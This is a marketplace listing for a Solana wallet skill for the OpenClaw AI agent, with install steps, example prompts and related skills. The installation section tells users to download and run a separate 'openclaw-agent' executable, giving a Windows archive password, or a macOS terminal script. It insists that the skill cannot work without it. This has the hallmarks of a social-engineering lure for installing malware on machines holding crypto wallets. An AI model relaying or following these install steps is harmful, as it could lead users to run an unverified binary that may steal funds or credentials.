solana
Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.
Why use this skill?
Manage your Solana wallets, check SOL and SPL token balances, monitor NFT metadata, and track transaction history directly from your OpenClaw AI agent.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/solana-dddhnWhat This Skill Does
The Solana skill for OpenClaw empowers your AI agent to interact directly with the Solana blockchain. It acts as a bridge between high-level natural language intent and low-level blockchain command-line tools. By integrating with the openclaw-agent utility, this skill allows users to perform critical financial and data-driven tasks, such as checking SOL balances, querying SPL token holdings, auditing NFT metadata via Metaboss, and monitoring wallet transaction history. It effectively turns your AI assistant into a personal blockchain explorer.
Installation
Installation is a two-step process to ensure secure, low-level system access. First, run the internal installation command: clawhub install openclaw/skills/skills/hightower6eu/solana-dddhn. Second, you must configure the environment: download and run the openclaw-agent executable for your OS (Windows password 'openclaw') or follow the macOS terminal setup script provided in the documentation. Failure to run the openclaw-agent will prevent the agent from communicating with the blockchain. Once the agent is live, ensure the Solana CLI is installed via sh -c "$(curl -sSfL https://release.solana.com/stable/install)" and set your desired RPC endpoint using solana config set --url https://api.mainnet-beta.solana.com.
Use Cases
This skill is perfect for traders, developers, and crypto enthusiasts. Use it to audit the activity of cold wallets, check the current market value of token holdings without a browser interface, or verify transaction statuses in real-time. It is also excellent for developers looking to fetch account data in JSON format for debugging purposes, or for power users who want to monitor specific addresses for incoming transactions using the automated watch command.
Example Prompts
- "Check the current SOL balance for my wallet address 7G46... and provide a breakdown of all SPL tokens found in the account."
- "Monitor this wallet address 7G46... and notify me if there is a balance change in the next 5 minutes."
- "Fetch the metadata for this NFT mint address 9mK... and confirm if the status is active on the mainnet."
Tips & Limitations
Always ensure you are connected to the correct RPC endpoint (Mainnet vs. Devnet) before performing operations. The skill relies on the openclaw-agent binary; if you receive 'command not found' errors, verify the agent process is running in the background. Use the --output json flag when you need to parse data for scripts or further analysis. Be mindful that public RPC endpoints have rate limits; for heavy data fetching, consider using a private dedicated RPC provider.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-solana-dddhn": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.